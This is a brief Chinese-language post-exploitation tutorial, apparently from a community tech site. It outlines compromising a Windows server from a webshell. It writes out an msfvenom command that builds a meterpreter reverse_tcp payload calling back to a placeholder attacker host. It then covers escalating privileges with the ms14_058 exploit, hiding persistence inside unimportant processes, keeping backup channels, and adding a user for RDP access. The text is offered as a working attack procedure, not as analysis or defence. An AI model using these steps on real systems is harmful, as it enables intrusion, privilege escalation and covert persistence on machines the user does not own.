主要思路
1.拿到webshell
2.上传大马
3.利用meterpreter模块生成payload
4.本地进行监听
5.进行提权
6.进行维权
7.生成新用户,连接3389
一、本地监听端口
①.生成payload
msfvenom -p windows/meterpreter/reverse_tcp lhost= x.x.x.x lport=xxx -f exe >xxxx/123.exe
②.上传123.exe
这里直接在大马上进行上传运行即可。(随便找一个有执行权限的目录即可)
③.msf本地监听端口,并运行123.exe
拿到NETWORK SERVICE权限,这个是windows内置用户,大概权限跟user差不多。
我们这里利用ms14_058进行提权,可以影响win server 2008 r2一下的版本。
⑤.写入进程,进行维权。
注意点:
1.写入进程写在不重要的进程中
2.多准备几条通道进行备用
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。